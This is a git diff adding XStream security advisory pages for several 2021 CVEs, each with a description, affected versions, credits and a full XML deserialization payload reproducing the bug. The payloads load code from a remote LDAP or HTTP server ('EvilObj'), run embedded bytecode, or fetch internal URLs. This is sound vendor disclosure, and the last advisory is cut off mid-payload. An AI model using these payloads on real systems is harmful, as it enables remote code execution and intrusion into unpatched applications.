+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple TreeSet and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><sorted-set>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>test</type>
+ <value class='javax.swing.MultiUIDefaults' serialization='custom'>
+ <unserializable-parents/>
+ <hashtable>
+ <default>
+ <loadFactor>0.75</loadFactor>
+ <threshold>525</threshold>
+ </default>
+ <int>700</int>
+ <int>0</int>
+ </hashtable>
+ <javax.swing.UIDefaults>
+ <default>
+ <defaultLocale>zh_CN</defaultLocale>
+ <resourceCache/>
+ </default>
+ </javax.swing.UIDefaults>
+ <javax.swing.MultiUIDefaults>
+ <default>
+ <tables>
+ <javax.swing.UIDefaults serialization='custom'>
+ <unserializable-parents/>
+ <hashtable>
+ <default>
+ <loadFactor>0.75</loadFactor>
+ <threshold>525</threshold>
+ </default>
+ <int>700</int>
+ <int>1</int>
+ <string>lazyValue</string>
+ <javax.swing.UIDefaults_-ProxyLazyValue>
+ <className>javax.naming.InitialContext</className>
+ <methodName>doLookup</methodName>
+ <args>
+ <string>ldap://127.0.0.1:1389/#evil</string>
+ </args>
+ </javax.swing.UIDefaults_-ProxyLazyValue>
+ </hashtable>
+ <javax.swing.UIDefaults>
+ <default>
+ <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
+ <resourceCache/>
+ </default>
+ </javax.swing.UIDefaults>
+ </javax.swing.UIDefaults>
+ </tables>
+ </default>
+ </javax.swing.MultiUIDefaults>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+ <javax.naming.ldap.Rdn_-RdnEntry>
+ <type>test</type>
+ <value class='com.sun.org.apache.xpath.internal.objects.XString'>
+ <m__obj class='string'>test</m__obj>
+ </value>
+ </javax.naming.ldap.Rdn_-RdnEntry>
+</sorted-set>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>Ceclin and YXXX, White Hat Hacker from Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39147.html b/xstream-distribution/src/content/CVE-2021-39147.html
new file mode 100644
index 0000000000000000000000000000000000000000..5973d0252c443634df457f4c30fd9c5c4c4082a2
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39147.html
@@ -0,0 +1,244 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 28. May 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39147</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39147: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security framework
+ </a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple TreeSet and use XStream to marshal it to XML. 
Replace the XML with following snippet and + unmarshal it again with XStream:</p> +<div class="Source XML"><pre><sorted-set> + <javax.naming.ldap.Rdn_-RdnEntry> + <type>ysomap</type> + <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'> + <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'> + <parsedMessage>true</parsedMessage> + <soapVersion>SOAP_11</soapVersion> + <bodyParts/> + <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'> + <attachmentsInitialized>false</attachmentsInitialized> + <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'> + <soapPart/> + <mm> + <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'> + <aliases class='com.sun.jndi.ldap.LdapSearchEnumeration'> + <listArg class='javax.naming.CompoundName' serialization='custom'> + <javax.naming.CompoundName> + <properties/> + <int>1</int> + <string>ysomap</string> + </javax.naming.CompoundName> + </listArg> + <cleaned>false</cleaned> + <res> + <msgId>0</msgId> + <status>0</status> + </res> + <enumClnt> + <isLdapv3>false</isLdapv3> + <referenceCount>0</referenceCount> + <pooled>false</pooled> + <authenticateCalled>false</authenticateCalled> + </enumClnt> + <limit>1</limit> + <posn>0</posn> + <homeCtx> + <__contextType>0</__contextType> + <port__number>1099</port__number> + <hostname>127.0.0.1</hostname> + <clnt reference='../../enumClnt'/> + <handleReferrals>0</handleReferrals> + <hasLdapsScheme>true</hasLdapsScheme> + <netscapeSchemaBug>false</netscapeSchemaBug> + <referralHopLimit>0</referralHopLimit> + <batchSize>0</batchSize> + <deleteRDN>false</deleteRDN> + <typesOnly>false</typesOnly> + <derefAliases>0</derefAliases> + <addrEncodingSeparator/> + <connectTimeout>0</connectTimeout> + <readTimeout>0</readTimeout> + <waitForReply>false</waitForReply> + <replyQueueSize>0</replyQueueSize> + <useSsl>false</useSsl> + 
<useDefaultPortNumber>false</useDefaultPortNumber> + <parentIsLdapCtx>false</parentIsLdapCtx> + <hopCount>0</hopCount> + <unsolicited>false</unsolicited> + <sharable>false</sharable> + <enumCount>1</enumCount> + <closeRequested>false</closeRequested> + </homeCtx> + <more>true</more> + <hasMoreCalled>true</hasMoreCalled> + <startName class='javax.naming.ldap.LdapName' serialization='custom'> + <javax.naming.ldap.LdapName> + <default/> + <string>uid=ysomap,ou=oa,dc=example,dc=com</string> + </javax.naming.ldap.LdapName> + </startName> + <searchArgs> + <name class='javax.naming.CompoundName' reference='../../listArg'/> + <filter>ysomap</filter> + <cons> + <searchScope>1</searchScope> + <timeLimit>0</timeLimit> + <derefLink>false</derefLink> + <returnObj>true</returnObj> + <countLimit>0</countLimit> + </cons> + <reqAttrs/> + </searchArgs> + <entries> + <com.sun.jndi.ldap.LdapEntry> + <DN>uid=songtao.xu,ou=oa,dc=example,dc=com</DN> + <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'> + <default> + <ignoreCase>false</ignoreCase> + </default> + <int>4</int> + <com.sun.jndi.ldap.LdapAttribute serialization='custom'> + <javax.naming.directory.BasicAttribute> + <default> + <ordered>false</ordered> + <attrID>objectClass</attrID> + </default> + <int>1</int> + <string>javaNamingReference</string> + </javax.naming.directory.BasicAttribute> + <com.sun.jndi.ldap.LdapAttribute> + <default> + <rdn class=''javax.naming.CompositeName'' serialization=''custom''> + <javax.naming.CompositeName> + <int>0</int> + </javax.naming.CompositeName> + </rdn> + </default> + </com.sun.jndi.ldap.LdapAttribute> + </com.sun.jndi.ldap.LdapAttribute> + <com.sun.jndi.ldap.LdapAttribute serialization='custom'> + <javax.naming.directory.BasicAttribute> + <default> + <ordered>false</ordered> + <attrID>javaCodeBase</attrID> + </default> + <int>1</int> + <string>http://127.0.0.1/</string> + </javax.naming.directory.BasicAttribute> + <com.sun.jndi.ldap.LdapAttribute> + <default> 
+ <rdn class=''javax.naming.CompositeName'' serialization=''custom''> + <javax.naming.CompositeName> + <int>0</int> + </javax.naming.CompositeName> + </rdn> + </default> + </com.sun.jndi.ldap.LdapAttribute> + </com.sun.jndi.ldap.LdapAttribute> + <com.sun.jndi.ldap.LdapAttribute serialization='custom'> + <javax.naming.directory.BasicAttribute> + <default> + <ordered>false</ordered> + <attrID>javaClassName</attrID> + </default> + <int>1</int> + <string>foo</string> + </javax.naming.directory.BasicAttribute> + <com.sun.jndi.ldap.LdapAttribute> + <default> + <rdn class=''javax.naming.CompositeName'' serialization=''custom''> + <javax.naming.CompositeName> + <int>0</int> + </javax.naming.CompositeName> + </rdn> + </default> + </com.sun.jndi.ldap.LdapAttribute> + </com.sun.jndi.ldap.LdapAttribute> + <com.sun.jndi.ldap.LdapAttribute serialization='custom'> + <javax.naming.directory.BasicAttribute> + <default> + <ordered>false</ordered> + <attrID>javaFactory</attrID> + </default> + <int>1</int> + <string>EvilObj</string> + </javax.naming.directory.BasicAttribute> + <com.sun.jndi.ldap.LdapAttribute> + <default> + <rdn class=''javax.naming.CompositeName'' serialization=''custom''> + <javax.naming.CompositeName> + <int>0</int> + </javax.naming.CompositeName> + </rdn> + </default> + </com.sun.jndi.ldap.LdapAttribute> + </com.sun.jndi.ldap.LdapAttribute> + </attributes> + </com.sun.jndi.ldap.LdapEntry> + </entries> + </aliases> + </it> + </mm> + </multiPart> + </sm> + </message> + </value> + </javax.naming.ldap.Rdn_-RdnEntry> + <javax.naming.ldap.Rdn_-RdnEntry> + <type>ysomap</type> + <value class='com.sun.org.apache.xpath.internal.objects.XString'> + <m__obj class='string'>test</m__obj> + </value> + </javax.naming.ldap.Rdn_-RdnEntry> +</sorted-set> +</pre></div> +<div class="Source Java"><pre>XStream xstream = new XStream(); +xstream.fromXML(xml); +</pre></div> + + <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled.</p> + 
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>wh1t3p1g G5-RD6@IIE found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39148.html b/xstream-distribution/src/content/CVE-2021-39148.html
new file mode 100644
index 0000000000000000000000000000000000000000..090fa17b7d216717234adae4810e15273d7ffa8e
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39148.html
@@ -0,0 +1,134 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 28. May 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39148</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39148: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security framework
+ </a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple TreeSet and use XStream to marshal it to XML. 
Replace the XML with following snippet and + unmarshal it again with XStream:</p> +<div class="Source XML"><pre><sorted-set> + <javax.naming.ldap.Rdn_-RdnEntry> + <type>ysomap</type> + <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'> + <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'> + <parsedMessage>true</parsedMessage> + <soapVersion>SOAP_11</soapVersion> + <bodyParts/> + <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'> + <attachmentsInitialized>false</attachmentsInitialized> + <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'> + <soapPart/> + <mm> + <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'> + <aliases class='com.sun.jndi.toolkit.dir.ContextEnumerator'> + <children class='javax.naming.directory.BasicAttribute$ValuesEnumImpl'> + <list class='com.sun.xml.internal.dtdparser.SimpleHashtable'> + <current> + <hash>1</hash> + <key class='javax.naming.Binding'> + <name>ysomap</name> + <isRel>false</isRel> + <boundObj class='com.sun.jndi.ldap.LdapReferralContext'> + <refCtx class='javax.naming.spi.ContinuationDirContext'> + <cpe> + <stackTrace/> + <suppressedExceptions class='java.util.Collections$UnmodifiableRandomAccessList' resolves-to='java.util.Collections$UnmodifiableList'> + <c class='list'/> + <list reference='../c'/> + </suppressedExceptions> + <resolvedObj class='javax.naming.Reference'> + <className>EvilObj</className> + <addrs/> + <classFactory>EvilObj</classFactory> + <classFactoryLocation>http://127.0.0.1:1099/</classFactoryLocation> + </resolvedObj> + <altName class='javax.naming.CompoundName' serialization='custom'> + <javax.naming.CompoundName> + <properties/> + <int>1</int> + <string>ysomap</string> + </javax.naming.CompoundName> + </altName> + </cpe> + </refCtx> + <skipThisReferral>false</skipThisReferral> + <hopCount>0</hopCount> + </boundObj> + </key> + 
</current> + <currentBucket>0</currentBucket> + <count>0</count> + <threshold>0</threshold> + </list> + </children> + <currentReturned>true</currentReturned> + <currentChildExpanded>false</currentChildExpanded> + <rootProcessed>true</rootProcessed> + <scope>2</scope> + </aliases> + </it> + </mm> + </multiPart> + </sm> + </message> + </value> + </javax.naming.ldap.Rdn_-RdnEntry> + <javax.naming.ldap.Rdn_-RdnEntry> + <type>ysomap</type> + <value class='com.sun.org.apache.xpath.internal.objects.XString'> + <m__obj class='string'>test</m__obj> + </value> + </javax.naming.ldap.Rdn_-RdnEntry> +</sorted-set> +</pre></div> +<div class="Source Java"><pre>XStream xstream = new XStream(); +xstream.fromXML(xml); +</pre></div> + + <p>Depending on the JDK, the code from the remote server is executed as soon as the XML gets unmarshalled.</p> + + <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p> + + <h2 id="impact">Impact</h2> + + <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed + input stream.</p> + + <h2 id="workarounds">Workarounds</h2> + + <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p> + + <h2 id="credits">Credits</h2> + + <p>wh1t3p1g G5-RD6@IIE found and reported the issue to XStream and provided the required information to reproduce it.</p> + + </body> + </html> diff --git a/xstream-distribution/src/content/CVE-2021-39149.html b/xstream-distribution/src/content/CVE-2021-39149.html new file mode 100644 index 0000000000000000000000000000000000000000..31a7b2b75fafa47399b41c467f816b7a85250bc3 --- /dev/null +++ b/xstream-distribution/src/content/CVE-2021-39149.html 
@@ -0,0 +1,102 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 26. June 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39149</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39149: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple LinkedHashSet and use XStream to marshal it to XML. 
Replace the XML with following snippet and + unmarshal it again with XStream:</p> +<div class="Source XML"><pre><linked-hash-set> + <dynamic-proxy> + <interface>map</interface> + <handler class='com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl'> + <classToInvocationHandler class='linked-hash-map'/> + <defaultHandler class='sun.tracing.NullProvider'> + <active>true</active> + <providerType>java.lang.Object</providerType> + <probes> + <entry> + <method> + <class>java.lang.Object</class> + <name>hashCode</name> + <parameter-types/> + </method> + <sun.tracing.dtrace.DTraceProbe> + <proxy class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'/> + <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> + <default> + <__name>Pwnr</__name> + <__bytecodes> + <byte-array>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</byte-array> + <byte-array>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</byte-array> + </__bytecodes> + <__transletIndex>-1</__transletIndex> + <__indentNumber>0</__indentNumber> + </default> + </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> + </proxy> + <implementing__method> + <class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class> + <name>getOutputProperties</name> + <parameter-types/> + </implementing__method> + </sun.tracing.dtrace.DTraceProbe> + </entry> + </probes> + </defaultHandler> + </handler> + </dynamic-proxy> +</linked-hash-set> +</pre></div> +<div class="Source Java"><pre>XStream xstream = new XStream(); +xstream.fromXML(xml); +</pre></div> + + <p>As soon as the XML gets unmarshalled, the code from the payload gets executed on the host.</p> + + <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. 
JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to execute arbitrary code only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>Lai Han of NSFOCUS security team found and reported the issue to XStream and provided the required information
+ to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39150.html b/xstream-distribution/src/content/CVE-2021-39150.html
new file mode 100644
index 0000000000000000000000000000000000000000..5647936846a8c8315a19be52df0dd235587e05c8
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39150.html
@@ -0,0 +1,235 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 5. July 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39150</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39150: A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams
+ from an arbitrary URL referencing a resource in an intranet or the local host.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box with Java
+ runtime version 14 to 8. No user is affected, who followed the recommendation to setup
+ <a href="security.html#framework">XStream's security framework</a> with a whitelist limited to the minimal
+ required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in a server-side forgery request.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. 
Replace the XML with following snippet and + unmarshal it again with XStream:</p> +<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'> + <unserializable-parents/> + <java.util.PriorityQueue> + <default> + <size>2</size> + </default> + <int>3</int> + <dynamic-proxy> + <interface>java.lang.Comparable</interface> + <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'> + <owner/> + <managedObjectManagerClosed>false</managedObjectManagerClosed> + <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'> + <stubHandlers> + <entry> + <method> + <class>java.lang.Comparable</class> + <name>compareTo</name> + <parameter-types> + <class>java.lang.Object</class> + </parameter-types> + </method> + <com.sun.xml.internal.ws.client.sei.StubHandler> + <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'> + <indices> + <int>0</int> + </indices> + <getters> + <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter> + </getters> + <accessors> + <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2> + <val_-isJAXBElement>false</val_-isJAXBElement> + <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'> + <type>int</type> + <field> + <name>hash</name> + <clazz>java.lang.String</clazz> + </field> + </val_-getter> + <val_-isListType>false</val_-isListType> + <val_-n> + <namespaceURI/> + <localPart>hash</localPart> + <prefix/> + </val_-n> + <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'> + <type>java.lang.String</type> + <method> + <class>jdk.nashorn.internal.runtime.Source</class> + <name>readFully</name> + <parameter-types> + <class>java.net.URL</class> + </parameter-types> + </method> + </val_-setter> + <outer-class> + <propertySetters> + <entry> + <string>serialPersistentFields</string> + <com.sun.xml.internal.ws.spi.db.FieldSetter> + <type>[Ljava.io.ObjectStreamField;</type> + <field> + <name>serialPersistentFields</name> + 
<clazz>java.lang.String</clazz> + </field> + </com.sun.xml.internal.ws.spi.db.FieldSetter> + </entry> + <entry> + <string>CASE_INSENSITIVE_ORDER</string> + <com.sun.xml.internal.ws.spi.db.FieldSetter> + <type>java.util.Comparator</type> + <field> + <name>CASE_INSENSITIVE_ORDER</name> + <clazz>java.lang.String</clazz> + </field> + </com.sun.xml.internal.ws.spi.db.FieldSetter> + </entry> + <entry> + <string>serialVersionUID</string> + <com.sun.xml.internal.ws.spi.db.FieldSetter> + <type>long</type> + <field> + <name>serialVersionUID</name> + <clazz>java.lang.String</clazz> + </field> + </com.sun.xml.internal.ws.spi.db.FieldSetter> + </entry> + <entry> + <string>value</string> + <com.sun.xml.internal.ws.spi.db.FieldSetter> + <type>[C</type> + <field> + <name>value</name> + <clazz>java.lang.String</clazz> + </field> + </com.sun.xml.internal.ws.spi.db.FieldSetter> + </entry> + <entry> + <string>hash</string> + <com.sun.xml.internal.ws.spi.db.FieldSetter> + <type>int</type> + <field reference='../../../../../val_-getter/field'/> + </com.sun.xml.internal.ws.spi.db.FieldSetter> + </entry> + </propertySetters> + <propertyGetters> + <entry> + <string>serialPersistentFields</string> + <com.sun.xml.internal.ws.spi.db.FieldGetter> + <type>[Ljava.io.ObjectStreamField;</type> + <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/> + </com.sun.xml.internal.ws.spi.db.FieldGetter> + </entry> + <entry> + <string>CASE_INSENSITIVE_ORDER</string> + <com.sun.xml.internal.ws.spi.db.FieldGetter> + <type>java.util.Comparator</type> + <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/> + </com.sun.xml.internal.ws.spi.db.FieldGetter> + </entry> + <entry> + <string>serialVersionUID</string> + <com.sun.xml.internal.ws.spi.db.FieldGetter> + <type>long</type> + <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/> + 
</com.sun.xml.internal.ws.spi.db.FieldGetter> + </entry> + <entry> + <string>value</string> + <com.sun.xml.internal.ws.spi.db.FieldGetter> + <type>[C</type> + <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/> + </com.sun.xml.internal.ws.spi.db.FieldGetter> + </entry> + <entry> + <string>hash</string> + <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/> + </entry> + </propertyGetters> + <elementLocalNameCollision>false</elementLocalNameCollision> + <contentClass>java.lang.String</contentClass> + <elementDeclaredTypes/> + </outer-class> + </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2> + </accessors> + <wrapper>java.lang.Object</wrapper> + <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/> + <dynamicWrapper>false</dynamicWrapper> + </bodyBuilder> + <isOneWay>false</isOneWay> + </com.sun.xml.internal.ws.client.sei.StubHandler> + </entry> + </stubHandlers> + <clientConfig>false</clientConfig> + </databinding> + <methodHandlers> + <entry> + <method reference='../../../databinding/stubHandlers/entry/method'/> + <com.sun.xml.internal.ws.client.sei.SyncMethodHandler> + <owner reference='../../../..'/> + <method reference='../../../../databinding/stubHandlers/entry/method'/> + <isVoid>false</isVoid> + <isOneway>false</isOneway> + </com.sun.xml.internal.ws.client.sei.SyncMethodHandler> + </entry> + </methodHandlers> + </handler> + </dynamic-proxy> + <url>http://localhost:8080/internal/</url> + </java.util.PriorityQueue> +</java.util.PriorityQueue> +</pre></div> +<div class="Source Java"><pre>XStream xstream = new XStream(); +xstream.fromXML(xml); +</pre></div> + + <p>As soon as the XML gets unmarshalled, the payload gets executed and the data from the URL location is collected.</p> + + <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. 
JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to request data from internal resources that are not publicly
+ available only by manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>Lai Han of NSFOCUS security team found and reported the issue to XStream and provided the required information
+ to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-39151.html b/xstream-distribution/src/content/CVE-2021-39151.html
new file mode 100644
index 0000000000000000000000000000000000000000..93708aa57891d74df6f36b214f02148860018fff
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-39151.html
@@ -0,0 +1,177 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 9. July 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-39151</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-39151: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security framework
+ </a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create an empty EventListenerList and use XStream to marshal it to XML. 
Replace the XML with following snippet and + unmarshal it again with XStream:</p> +<div class="Source XML"><pre><javax.swing.event.EventListenerList serialization='custom'> + <javax.swing.event.EventListenerList> + <default> + <listenerList> + <javax.swing.undo.UndoManager> + <hasBeenDone>true</hasBeenDone> + <alive>true</alive> + <inProgress>true</inProgress> + <edits> + <com.sun.xml.internal.ws.api.message.Packet> + <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'> + <parsedMessage>true</parsedMessage> + <soapVersion>SOAP_11</soapVersion> + <bodyParts/> + <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'> + <attachmentsInitialized>false</attachmentsInitialized> + <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'> + <soapPart/> + <mm> + <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'> + <aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'> + <cleaned>false</cleaned> + <entries> + <com.sun.jndi.ldap.LdapEntry> + <DN>cn=four,cn=three,cn=two,cn=one</DN> + <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'> + <javax.naming.directory.BasicAttribute> + <default> + <ignoreCase>false</ignoreCase> + </default> + <int>4</int> + <com.sun.jndi.ldap.LdapAttribute serialization='custom'> + <javax.naming.directory.BasicAttribute> + <default> + <ordered>false</ordered> + <attrID>objectClass</attrID> + </default> + <int>1</int> + <string>javanamingreference</string> + </javax.naming.directory.BasicAttribute> + <com.sun.jndi.ldap.LdapAttribute> + <default> + <rdn class='com.sun.jndi.ldap.LdapName' serialization='custom'> + <com.sun.jndi.ldap.LdapName> + <string>cn=four,cn=three,cn=two,cn=one</string> + <boolean>false</boolean> + </com.sun.jndi.ldap.LdapName> + </rdn> + </default> + </com.sun.jndi.ldap.LdapAttribute> + </com.sun.jndi.ldap.LdapAttribute> + <com.sun.jndi.ldap.LdapAttribute 
